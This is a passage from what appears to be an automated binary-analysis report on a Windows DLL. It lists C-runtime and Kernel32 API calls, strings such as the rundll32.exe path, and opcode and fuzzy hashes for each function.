              • _ValidateLocalCookies.LIBCMT ref: 6FE66577
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6FE6657F
              • _ValidateLocalCookies.LIBCMT ref: 6FE66608
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6FE66633
              • _ValidateLocalCookies.LIBCMT ref: 6FE66688
              Strings
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 1170836740-1018135373
              • Opcode ID: e098d756e2f5ddd9eb8da4c1c77905275fde669f837576d5aa188cd2f8b6f5a0
              • Instruction ID: 39cf7d4aacf672f03ca29550361e8928ec70402ff3be3ef5971f7162ca86afa8
              • Opcode Fuzzy Hash: e098d756e2f5ddd9eb8da4c1c77905275fde669f837576d5aa188cd2f8b6f5a0
              • Instruction Fuzzy Hash: 8341953496021D9BCF10CF68C884A9EBFB5AF4632CF20855AD825AF395DB35E915CF90
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,6FE6C75A,?,3089EAF1,?,6FE71812,6FE67D84,B586E81C,00000000,6FE6C75A), ref: 6FE717C4
              Strings
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 0768882d75ce2917d7f98efc42d6edd55037f89aee0d851fb867a8574af3f501
              • Instruction ID: 2a08f18951e658bc7dd13d69114c1f1f071d241a2590298e59b1e7ce3efc50af
              • Opcode Fuzzy Hash: 0768882d75ce2917d7f98efc42d6edd55037f89aee0d851fb867a8574af3f501
              • Instruction Fuzzy Hash: 6621D875A42720A7DB319AA4CC90A8A3FAAAF43774B300210F915A73C1DF34F911C7D0
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1debd9a40a4206996f76b716b0eda5faace0664e90c4acec4e3ae1c2af055e0f
              • Instruction ID: 4f6427aec61fed550e73b2eca1e1aa8ca77eeac68f6eddaf799bdd7456a24ac5
              • Opcode Fuzzy Hash: 1debd9a40a4206996f76b716b0eda5faace0664e90c4acec4e3ae1c2af055e0f
              • Instruction Fuzzy Hash: 3AB11B70A043499FDB21CFA9C840BAE7FB2AF46328F305159E62497381DB76A942CB50
              APIs
              • GetLastError.KERNEL32(?,?,6FE66721,6FE651C4,6FE64B74), ref: 6FE667B1
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FE667BF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FE667D8
              • SetLastError.KERNEL32(00000000,?,6FE66721,6FE651C4,6FE64B74), ref: 6FE6682A
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 9c8f9b3520aa5c5b6fe9ea5c772bbff2e5527cf4e38c6ae2e578f57769218289
              • Instruction ID: 5a5d03d31a2be58154d085be8b7c1425da31414cf02e1cd9c39d932f8395db20
              • Opcode Fuzzy Hash: 9c8f9b3520aa5c5b6fe9ea5c772bbff2e5527cf4e38c6ae2e578f57769218289
              • Instruction Fuzzy Hash: 5C01FC321AEB2A5EAA2026749C946462F97EF4377CB31033DF5315D2E0EF116C119389
              Strings
              • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6FE73E14
              Similarity
              • API ID:
              • String ID: C:\Windows\SysWOW64\rundll32.exe
              • API String ID: 0-2837366778
              • Opcode ID: a4b4bbd94e72efd75a4ca4ca81ce749a2e312d38eb9ec1c82770061e8231af71
              • Instruction ID: f2d9e80c58a95b9d7a9ebbdc0eaf6532b13803c0a03ab3ea60941918871db87c
              • Opcode Fuzzy Hash: a4b4bbd94e72efd75a4ca4ca81ce749a2e312d38eb9ec1c82770061e8231af71
              • Instruction Fuzzy Hash: 98217971604315AFDBB1DF658C41C5BBFAAEF01368720451AEA149B290EF31E811C7A0
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3089EAF1,6FE6C75A,?,00000000,6FE7C710,000000FF,?,6FE6E3C3,B586E81C,?,6FE6E397,?), ref: 6FE6E45E
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FE6E470
              • FreeLibrary.KERNEL32(00000000,?,00000000,6FE7C710,000000FF,?,6FE6E3C3,B586E81C,?,6FE6E397,?), ref: 6FE6E492
              Strings
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 71a65aff50bc780f03e3cea869ffe38f1c760e07fa6fc124007ca48be7f844cd
              • Instruction ID: d37d5ce9d84f601dbf169e3a1bb74cefa8d48649441aa193af90fc83398fbfdb
              • Opcode Fuzzy Hash: 71a65aff50bc780f03e3cea869ffe38f1c760e07fa6fc124007ca48be7f844cd
              • Instruction Fuzzy Hash: A5016735544D29ABDB219B54CC04FEE7FBBFB06725F104525E825A2280DB75A900CB94
              APIs
              • __alloca_probe_16.LIBCMT ref: 6FE78D79
              • __alloca_probe_16.LIBCMT ref: 6FE78E42
              • __freea.LIBCMT ref: 6FE78EA9
                • Part of subcall function 6FE7047E: RtlAllocateHeap.NTDLL(00000000,6FE74371,7D32887D), ref: 6FE704B0
              • __freea.LIBCMT ref: 6FE78EBC
              • __freea.LIBCMT ref: 6FE78EC9
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocateHeap
              • String ID:
              • API String ID: 1423051803-0
              • Opcode ID: 08e228ac781b909063806dba62a836825682479f84b1dec11d4baad1d239df35
              • Instruction ID: 25f0bacd5788ee709ebdba41e4ff90108dc464676f3479f26288bd73123b6421
              • Opcode Fuzzy Hash: 08e228ac781b909063806dba62a836825682479f84b1dec11d4baad1d239df35
              • Instruction Fuzzy Hash: A5519572904206ABEB354E65CD40DAB3EADEFA5718B31052EFD1496250EF30EE51C760
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6FE67863,?,?,00000001,?,?,?,6FE67952,00000001,FlsFree,6FE7DCE0,FlsFree), ref: 6FE678BF
              • GetLastError.KERNEL32(?,6FE67863,?,?,00000001,?,?,?,6FE67952,00000001,FlsFree,6FE7DCE0,FlsFree,?,?,6FE66878), ref: 6FE678C9
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6FE678F1
              Strings
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: dd154539d9d41bddcf9e1eba0681e41ac35fe033226c42508dd0cd449e4217d3
              • Instruction ID: 0bda078e3f2cc561ba59d66806d2a50a0fac63e3844f1eaad02587ecaae56098
              • Opcode Fuzzy Hash: dd154539d9d41bddcf9e1eba0681e41ac35fe033226c42508dd0cd449e4217d3
              • Instruction Fuzzy Hash: D1E01A34284719B6EF201E60DC05B893FA7AF02B94F305020F90DE81D1EFA5F862D784
              APIs
              • GetConsoleOutputCP.KERNEL32(3089EAF1,00000000,00000000,?), ref: 6FE72649
                • Part of subcall function 6FE74945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FE78E9F,?,00000000,-00000008), ref: 6FE749A6
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6FE7289B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FE728E1
              • GetLastError.KERNEL32 ref: 6FE72984
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 42727fe5137d33d4b791fa9c3a74bea1b320906961debd27443001f593bf2eb0
              • Instruction ID: 8095a45bf02032291c2fc078ce36a7b7a7eeef26584e96ff68e491671cc40122
              • Opcode Fuzzy Hash: 42727fe5137d33d4b791fa9c3a74bea1b320906961debd27443001f593bf2eb0
              • Instruction Fuzzy Hash: 1FD15975D042599FCB25CFA8C880AEDBFB5FF0A314F28416AE465EB351DA30A942CF50
              APIs
              Similarity
              • API ID: AdjustPointer
              • String ID:
              • API String ID: 1740715915-0
              • Opcode ID: 17d42bb6074d86fbf526fa6d9c05a3f59c1f6b77f8463c6c9aa335c3045b296a
              • Instruction ID: 88696174092024631593abea885fabb79b44483a111c3ccab81d58719f85344d
              • Opcode Fuzzy Hash: 17d42bb6074d86fbf526fa6d9c05a3f59c1f6b77f8463c6c9aa335c3045b296a
              • Instruction Fuzzy Hash: AE51AD726A470A9FDB148F65C980BAA7BB5FF46318F30452EDC154F2A0EB31E881C790
              APIs
                • Part of subcall function 6FE74945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FE78E9F,?,00000000,-00000008), ref: 6FE749A6
              • GetLastError.KERNEL32 ref: 6FE736F8
              • __dosmaperr.LIBCMT ref: 6FE736FF
              • GetLastError.KERNEL32(?,?,?,?), ref: 6FE73739
              • __dosmaperr.LIBCMT ref: 6FE73740
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: e48c6aecbc81831f4f23525f05d955914fe2954508d7426dba011c17d14bf390
              • Instruction ID: 18126f119859b3689ac006473de7fbd494d020bcee3466f856d29abaedc52ba2
              • Opcode Fuzzy Hash: e48c6aecbc81831f4f23525f05d955914fe2954508d7426dba011c17d14bf390
              • Instruction Fuzzy Hash: F221AFB1604315AF97709FB5C88185BBFA9EF013687208619EA2997780EF31F801CBA0
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6FE749F0
                • Part of subcall function 6FE74945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FE78E9F,?,00000000,-00000008), ref: 6FE749A6
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE74A28
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE74A48
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: 79f797e3f48ac68c8c774c1e9c8c518e9eea323c0ed85f2c3912f26fb8746c72
              • Instruction ID: 1e5edcb741399a357b0d3046297168e57840fee633daf84ab34bedbe8f8490cf
              • Opcode Fuzzy Hash: 79f797e3f48ac68c8c774c1e9c8c518e9eea323c0ed85f2c3912f26fb8746c72
              • Instruction Fuzzy Hash: 8411C8B6505615BF6B3297B64D88C6F6DAEEE862BC730111AF600D1240FF71DD02C275
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6FE6D16B,00000000,00000000,?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000), ref: 6FE79F64
              • GetLastError.KERNEL32(?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000,?,?,?,6FE72FB2,00000000), ref: 6FE79F70
                • Part of subcall function 6FE79F36: CloseHandle.KERNEL32(FFFFFFFE,6FE79F80,?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000,?,?), ref: 6FE79F46
              • ___initconout.LIBCMT ref: 6FE79F80
                • Part of subcall function 6FE79EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6FE79F27,6FE785CE,?,?,6FE729D8,?,00000000,00000000,?), ref: 6FE79F0B
              • WriteConsoleW.KERNEL32(00000000,00000000,6FE6D16B,00000000,?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000,?), ref: 6FE79F95
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: b9348e2fb66b2324a2e7bb25f924b451862a3191288d1bbc9c0013db23883e82
              • Instruction ID: d6beec268ffccc74b978b40520719111d467624fe08f9e9305cf44f2af797d58
              • Opcode Fuzzy Hash: b9348e2fb66b2324a2e7bb25f924b451862a3191288d1bbc9c0013db23883e82
              • Instruction Fuzzy Hash: 25F0F83A010568BBCF325F918C0899E3FA7EF0B2B1F204020FA2995260CB329820DB91
              APIs
              Strings
              Similarity
              • API ID: __aulldiv
              • String ID: +$-
              • API String ID: 3732870572-2137968064
              • Opcode ID: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction ID: f4edd4e97d74ccc7eb633de8315e275a71fd755bb8fd6d6089ec5fc460839796
              • Opcode Fuzzy Hash: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction Fuzzy Hash: B2A1B331BC525C9EDF14CE7C88507EE7FB1AF4632AF24865AE8A59B390C234E5028B50
              APIs
              • RtlEncodePointer.NTDLL(00000000), ref: 6FE66EA4
              Strings
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: 689a9a75effa35e7ebc78dd6a1819dd5e6257b259dbedd62bb5d7f85eaee53f4
              • Instruction ID: 108e73fd3cc4478ba8b72a9e6cc868fef34466f5bcc076806b1a731f36138a0b
              • Opcode Fuzzy Hash: 689a9a75effa35e7ebc78dd6a1819dd5e6257b259dbedd62bb5d7f85eaee53f4
              • Instruction Fuzzy Hash: 2B41287195020DEFDF05CF94CC80AEE7FB6BF49308F2481A9F914AA251D335A951DB51